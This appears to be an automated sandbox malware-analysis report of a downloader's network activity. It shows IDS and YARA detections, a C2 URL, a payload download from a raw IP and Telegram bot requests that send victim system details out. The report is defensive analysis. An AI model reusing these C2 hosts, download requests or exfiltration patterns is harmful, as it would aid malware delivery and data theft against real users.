                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:53734 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:53795 -> 149.154.167.220:443
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: http://amazonenviro.com/245_Aiymwhpjxsg
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CE72C InternetCheckConnectionA,7_2_027CE72C
                  Source: global trafficTCP traffic: 192.168.2.5:53704 -> 208.91.198.176:587
                  Source: global trafficTCP traffic: 192.168.2.5:53579 -> 1.1.1.1:53
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 05 Jan 2025 22:54:23 GMTAccept-Ranges: bytesETag: "185c71c3c45fdb1:0"Server: Microsoft-IIS/8.5Date: Mon, 06 Jan 2025 06:54:02 GMTContent-Length: 1161216Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d0 06 00 00 e4 0a 00 00 00 00 00 0c e8 06 00 00 10 00 00 00 f0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 12 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 07 00 6e 26 00 00 00 20 08 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 e8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 57 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 c4 06 00 00 10 00 00 00 c6 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 48 08 00 00 00 e0 06 00 00 0a 00 00 00 ca 06 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 1f 00 00 00 f0 06 00 00 20 00 00 00 d4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 ec 36 00 00 00 10 07 00 00 00 00 00 00 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 6e 26 00 00 00 50 07 00 00 28 00 00 00 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 80 07 00 00 00 00 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 90 07 00 00 02 00 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 7c 00 00 00 a0 07 00 00 7e 00 00 00 1e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 1c 0a 00 00 20 08 00 00 1c 0a 00 00 9c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 12 00 00 00 00 00 00 b8 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:18:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:18:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                  Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49731 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49736 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53584 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49723 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53650 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53671 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53683 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53694 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53623 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53662 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53738 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53709 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53724 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53711 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53681 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49733 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:53624 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:53705 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:53731 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:53612 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:53716 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:53644 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53704 -> 208.91.198.176:587
                  Source: global trafficHTTP traffic detected: GET /image.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
                  Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:53636 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:53696 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
